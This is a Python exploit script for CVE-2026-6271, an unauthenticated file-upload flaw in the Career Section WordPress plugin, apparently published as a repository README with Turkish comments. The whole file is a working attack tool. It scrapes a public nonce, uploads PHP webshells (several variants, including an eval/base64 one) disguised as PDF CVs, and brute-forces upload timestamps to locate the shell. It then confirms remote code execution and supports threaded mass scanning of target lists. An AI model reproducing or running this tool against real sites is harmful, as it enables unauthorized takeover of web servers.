README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2026-6271 — Career Section WordPress Plugin <= 1.7
Unauthenticated Arbitrary File Upload → Remote Code Execution
Saldırı Zinciri:
1. csection custom post type URL'lerini bul (sitemap / slug tarama)
2. Job listing sayfasından csaf_form_nonce çek (public HTML'de gömülü)
3. shell.php dosyasını application/pdf MIME tipiyle yükle
4. Timestamp brute-force ile shell URL'ini bul
5. RCE doğrula → uid=33(www-data)
Researcher : Paolo Tresso - Wordfence
CVSS : 9.8 Critical
"""
import requests
import argparse
import re
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from threading import Lock
requests.packages.urllib3.disable_warnings()
G = "\033[92m"; R = "\033[91m"; Y = "\033[93m"
C = "\033[96m"; D = "\033[90m"; B = "\033[1m"; X = "\033[0m"
_lock = Lock()
_counter = [0]
def out(msg):
with _lock:
sys.stdout.write("\r" + " " * 90 + "\r")
sys.stdout.write(msg + "\n")
sys.stdout.flush()
def progress(total):
with _lock:
_counter[0] += 1
n = _counter[0]
pct = n * 100 // total
bar = "█" * (pct // 5) + "░" * (20 - pct // 5)
sys.stdout.write(f"\r[{bar}] {n}/{total} ({pct}%) ")
sys.stdout.flush()
# ══════════════════════════════════════════════════════════════
# SHELL TİPLERİ
# ══════════════════════════════════════════════════════════════
def build_shell(shell_type="system"):
shells = {
"system": b'<?php system($_GET["cmd"]); ?>',
"passthru": b'<?php passthru($_GET["cmd"]); ?>',
"exec": b'<?php echo exec($_GET["cmd"]); ?>',
"assert": b'<?php assert($_POST["cmd"]); ?>',
"b64": b'<?php eval(base64_decode($_POST["cmd"])); ?>',
"full": (
b'<?php '
b'if(isset($_REQUEST["cmd"])){'
b'$o=@shell_exec($_REQUEST["cmd"]);'
b'if(!$o)$o=@system($_REQUEST["cmd"]);'
b'if(!$o)$o=@exec($_REQUEST["cmd"]);'
b'echo "<pre>".$o."</pre>";} ?>'
),
}
return shells.get(shell_type, shells["system"])
# ══════════════════════════════════════════════════════════════
# JOB LİSTİNG URL BULMA — csection custom post type
# ══════════════════════════════════════════════════════════════
# csection post type için yaygın slug'lar
JOB_SLUGS = [
"/careers/", "/jobs/", "/job/", "/career/",
"/job-listings/", "/job-board/", "/vacancies/",
"/positions/", "/opportunities/", "/employment/",
"/apply/", "/csection/", "/career-section/",
"/work-with-us/", "/join-us/", "/hiring/",
"/open-positions/", "/job-openings/",
]
def find_job_urls(sess, base):
"""
csection post type URL'lerini bul:
1. Sitemap'ten tara
2. Yaygın slug'ları dene
3. wp-json REST API'den csection postlarını çek
"""
job_urls = []
# 1. Sitemap tarama
for sm in ["/sitemap.xml", "/sitemap_index.xml",
"/wp-sitemap.xml", "/page-sitemap.xml",
"/csection-sitemap.xml"]:
try:
r = sess.get(base + sm, timeout=5)
if r.status_code == 200:
urls = re.findall(r'<loc>(https?://[^<]+)</loc>', r.text)
for u in urls:
if not re.search(r'\.(jpg|png|gif|css|js|xml)$', u, re.I):
job_urls.append(u)
if len(job_urls) >= 20:
break
except: continue
# 2. wp-json REST API — csection post type
for ep in ["/wp-json/wp/v2/csection",
"/wp-json/wp/v2/career-section",
"/wp-json/wp/v2/careers"]:
try:
r = sess.get(base + ep + "?per_page=10", timeout=5)
if r.status_code == 200:
posts = r.json()
if isinstance(posts, list):
for p in posts:
link = p.get("link", "")
if link:
job_urls.append(link)
except: continue
# 3. Yaygın slug'ları ekle
for slug in JOB_SLUGS:
job_urls.append(base + slug)
# Tekrarları kaldır
return list(dict.fromkeys(job_urls))
# ══════════════════════════════════════════════════════════════
# NONCE ÇEKME — csaf_form_nonce
# ══════════════════════════════════════════════════════════════
NONCE_PATTERNS = [
# Standart wp_nonce_field çıktısı
r'name=["\']csaf_form_nonce["\']\s+value=["\']([a-zA-Z0-9]{8,})["\']',
r'value=["\']([a-zA-Z0-9]{8,})["\']\s+[^>]*name=["\']csaf_form_nonce["\']',
# id ile
r'id=["\']csaf_form_nonce["\']\s+[^>]*value=["\']([a-zA-Z0-9]{8,})["\']',
# Genel nonce field
r'csaf_form_nonce["\'][^>]*value=["\']([a-zA-Z0-9]{8,})["\']',
# wp_nonce_field genel pattern
r'_wpnonce["\'][^>]*value=["\']([a-zA-Z0-9]{8,})["\']',
]
def extract_nonce(html):
"""HTML içinden csaf_form_nonce değerini çek."""
for pat in NONCE_PATTERNS:
m = re.search(pat, html, re.S | re.I)
if m:
return m.group(1)
return None
def is_job_page(html):
"""Sayfanın csection job listing sayfası olup olmadığını kontrol et."""
indicators = [
"csaf_form_nonce",
"career-section",
"csection",
"cv",
"first_name",
"Apply Now",
"apply-now",
"job-application",
]
html_lower = html.lower()
return any(ind.lower() in html_lower for ind in indicators)
def get_nonce(sess, base):
"""
Job listing sayfasını bul ve nonce çek.
Birden fazla URL denenir.
"""
job_urls = find_job_urls(sess, base)
for url in job_urls[:40]:
try:
r = sess.get(url, timeout=6, allow_redirects=True)
if r.status_code != 200:
continue
if not is_job_page(r.text):
continue
nonce = extract_nonce(r.text)
if nonce:
return nonce, url
except: continue
return None, None
# ══════════════════════════════════════════════════════════════
# SHELL YÜKLEME
# ══════════════════════════════════════════════════════════════
def upload_shell(sess, job_url, nonce,
shell_name="shell.php", shell_type="system"):
"""
PHP webshell'i application/pdf MIME tipiyle job application formuna yükle.
Form alanları (templates/single-csection.php'den):
- first_name, last_name, present_address
- email_address, mobile_no, post_name
- submit, csaf_form_nonce
- cv (dosya) ← hedef alan
"""
ts_before = int(time.time()) # timestamp tahmini için
files = {
"cv": (
shell_name,
build_shell(shell_type),
"application/pdf" # ← MIME Spoofing — PHP dosyasını PDF gibi gönder
)
}
data = {
"first_name": "John",
"last_name": "Doe",
"present_address": "123 Main Street",
"email_address": "[email protected]",
"mobile_no": "1234567890",
"post_name": "Software Engineer",
"submit": "Submit",
"csaf_form_nonce": nonce, # ← Public sayfadan çekilen nonce
}
try:
r = sess.post(job_url, files=files, data=data, timeout=12)
ts_after = int(time.time())
body = r.text
# Başarı göstergeleri
success = any(ind in body for ind in [
"Application has been sent",
"application has been sent",
"successfully",
"thank you",
"Thank you",
"submitted",
])
# Hata göstergeleri
blocked = any(ind in body for ind in [
"file type",
"not allowed",
"invalid",
"error",
"failed",
])
if r.status_code == 200 and not blocked:
return {
"status": "UPLOADED",
"ts_before": ts_before,
"ts_after": ts_after,
"confirmed": success,
}
elif blocked:
return {"status": "BLOCKED", "raw": body[:200]}
else:
return {"status": f"HTTP_{r.status_code}", "raw": body[:200]}
except requests.exceptions.Timeout:
return {"status": "TIMEOUT"}
except requests.exceptions.ConnectionError:
return {"status": "CONN_ERR"}
except Exception as e:
return {"status": "EXCEPTION", "err": str(e)}
# ══════════════════════════════════════════════════════════════
# TIMESTAMP BRUTE-FORCE — Shell URL tespiti
# ══════════════════════════════════════════════════════════════
UPLOAD_PATH = "/wp-content/uploads/cs_applicant_submission_files"
def find_shell(sess, base, shell_name, ts_before, ts_after,
cmd="id", window=5):
"""
Dosya adı: <timestamp>_<shell_name>
ts_before - window ile ts_after + window arasındaki tüm
timestamp'leri dene.
sanitize_file_name() sadece özel karakterleri temizler,
uzantıya dokunmaz → shell.php olarak kalır.
"""
uploads = base + UPLOAD_PATH
# Timestamp aralığı: yükleme öncesi-5 ile sonrası+5
ts_start = ts_before - window
ts_end = ts_after + window
for ts in range(ts_start, ts_end + 1):
url = f"{uploads}/{ts}_{shell_name}"
try:
r = sess.get(url, params={"cmd": cmd},
timeout=5, allow_redirects=True)
if r.status_code == 200:
body = r.text.strip()
# RCE başarılı
if "uid=" in body and "gid=" in body:
return "RCE_OK", url, body[:200]
# Shell erişilebilir ama exec disabled
if len(body) > 0 and body not in ("", "0"):
return "SHELL_ALIVE", url, body[:200]
# Boş yanıt — shell var ama exec kapalı
if r.status_code == 200:
return "EXEC_DISABLED", url, ""
except: continue
return "NOT_FOUND", "", ""
# ══════════════════════════════════════════════════════════════
# TEKİL HEDEF KONTROLÜ
# ══════════════════════════════════════════════════════════════
def check(target, args, total=1):
if not target.startswith("http"):
target = "http://" + target
sess = requests.Session()
sess.headers["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
sess.verify = False
# Bağlantı testi
try:
r = sess.get(target, timeout=8, allow_redirects=True)
base = r.url.rstrip("/")
except:
progress(total)
return {"status": "UNREACH", "url": target}
# ── Adım 1: Nonce çek ──
nonce, job_url = get_nonce(sess, base)
if not nonce:
progress(total)
return {"status": "NO_NONCE", "url": base}
# ── Adım 2: Shell yükle ──
upload = upload_shell(
sess, job_url, nonce,
shell_name=args.shell_name,
shell_type=args.shell_type,
)
if upload["status"] != "UPLOADED":
progress(total)
return {
"status": upload["status"],
"url": base,
"nonce": nonce,
"job_url": job_url,
"raw": upload.get("raw", ""),
}
# ── Adım 3: Timestamp brute-force ile shell bul ──
rce_status, shell_url, rce_out = find_shell(
sess, base,
shell_name=args.shell_name,
ts_before=upload["ts_before"],
ts_after=upload["ts_after"],
cmd=args.verify_cmd,
window=args.ts_window,
)
progress(total)
return {
"status": "UPLOADED_" + rce_status,
"url": base,
"nonce": nonce,
"job_url": job_url,
"confirmed": upload.get("confirmed", False),
"shell_url": shell_url,
"rce_out": rce_out,
}
# ══════════════════════════════════════════════════════════════
# ÇIKTI YAZICI
# ══════════════════════════════════════════════════════════════
def print_result(res, fout=None):
s = res["status"]
u = res.get("url", "")
if s == "UPLOADED_RCE_OK":
out(f"{G}[★ RCE OK ] {u}")
out(f" Nonce : {res.get('nonce','')} (kaynak: {res.get('job_url','')})")
out(f" Shell URL : {res.get('shell_url','')}")
out(f" RCE Çıktı : {res.get('rce_out','')}{X}")
if fout:
fout.write(
f"RCE {u} shell={res.get('shell_url','')} "
f"nonce={res.get('nonce','')}\n"
)
fout.flush()
elif s == "UPLOADED_SHELL_ALIVE":
out(f"{Y}[★ SHELL ] {u}")
out(f" Shell URL : {res.get('shell_url','')}")
out(f" Yanıt : {res.get('rce_out','')}{X}")
if fout:
fout.write(f"SHELL {u} shell={res.get('shell_url','')}\n")
fout.flush()
elif s == "UPLOADED_EXEC_DISABLED":
out(f"{Y}[~ EXEC_DIS ] {u} shell={res.get('shell_url','')} (exec disabled){X}")
if fout:
fout.write(f"EXEC_DIS {u} shell={res.get('shell_url','')}\n")
fout.flush()
elif s == "UPLOADED_NOT_FOUND":
out(f"{C}[? UPLOADED ] {u} (yüklendi ama shell bulunamadı — TS window artır){X}")
elif s == "BLOCKED":
out(f"{D}[- BLOCKED ] {u} (dosya tipi engellendi){X}")
elif s == "NO_NONCE":
out(f"{Y}[~ NO_NONCE ] {u} (csaf_form_nonce bulunamadı){X}")
elif s == "UNREACH":
out(f"{D}[~ UNREACH ] {u}{X}")
elif s == "TIMEOUT":
out(f"{D}[~ TIMEOUT ] {u}{X}")
elif s == "CONN_ERR":
out(f"{D}[~ CONN_ERR ] {u}{X}")
else:
out(f"{D}[- {s:12s}] {u} {res.get('raw','')[:80]}{X}")
# ══════════════════════════════════════════════════════════════
# MAIN
# ══════════════════════════════════════════════════════════════
def main():
ap = argparse.ArgumentParser(
description="CVE-2026-6271 — Career Section <= 1.7 RCE Scanner",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Örnekler:
# Tekil hedef
python career_section_rce.py -u http://hedef.com
# Özel job URL ile (direkt)
python career_section_rce.py -u http://hedef.com --job-url http://hedef.com/careers/engineer/
# Toplu tarama
python career_section_rce.py -l targets.txt -t 20 -o sonuclar.txt
# Timestamp window artır (yavaş sunucular için)
python career_section_rce.py -u http://hedef.com --ts-window 10
# Full shell + özel komut
python career_section_rce.py -u http://hedef.com --shell-type full --verify-cmd "whoami"
# Proxy ile (Burp Suite)
python career_section_rce.py -u http://hedef.com --proxy http://127.0.0.1:8080
"""
)
group = ap.add_mutually_exclusive_group(required=True)
group.add_argument("-u", "--url", help="Tekil hedef URL")
group.add_argument("-l", "--list", help="Hedef listesi dosyası")
ap.add_argument("-t", "--threads", type=int, default=10)
ap.add_argument("-o", "--output", default="rce_confirmed.txt")
ap.add_argument("--job-url", help="Direkt job listing URL (opsiyonel)")
ap.add_argument("--shell-name", default="shell.php")
ap.add_argument("--shell-type",
choices=["system","passthru","exec","assert","b64","full"],
default="system")
ap.add_argument("--verify-cmd", default="id",
help="RCE doğrulama komutu (varsayılan: id)")
ap.add_argument("--ts-window", type=int, default=5,
help="Timestamp brute-force penceresi (varsayılan: ±5 sn)")
ap.add_argument("--proxy", help="Proxy URL")
ap.add_argument("--timeout", type=int, default=10)
args = ap.parse_args()
# ── Tekil hedef ──
if args.url:
print(f"\n{B}[*] Hedef : {args.url}")
print(f"[*] Shell : {args.shell_name} ({args.shell_type})")
print(f"[*] TS Window : ±{args.ts_window} saniye")
print(f"[*] Verify CMD : {args.verify_cmd}{X}\n")
res = check(args.url, args, total=1)
print_result(res)
if "UPLOADED" in res["status"]:
with open(args.output, "w") as f:
if res.get("shell_url"):
f.write(f"{res['shell_url']}\n")
print(f"\n{G}[+] Kaydedildi → {args.output}{X}")
return
# ── Toplu tarama ──
with open(args.list) as f:
targets = [l.strip() for l in f if l.strip()]
total = len(targets)
_counter[0] = 0
print(f"\n{B}[*] {total} hedef | CVE-2026-6271 Career Section | threads={args.threads}{X}\n")
stats = {}
with open(args.output, "w") as fout:
with ThreadPoolExecutor(max_workers=args.threads) as ex:
futs = {ex.submit(check, t, args, total): t for t in targets}
for fut in as_completed(futs):
res = fut.result()
s = res["status"]
stats[s] = stats.get(s, 0) + 1
print_result(res, fout)
sys.stdout.write("\n")
print(f"\n{B}{'─'*62}")
for k, v in sorted(stats.items(), key=lambda x: -x[1]):
bar = "█" * min(v, 30)
print(f" {k:28s}: {v:4d} {bar}")
print(f"{'─'*62}")
print(f" RCE onaylı → {args.output}")
print(f"{'─'*62}{X}")
if __name__ == "__main__":
main()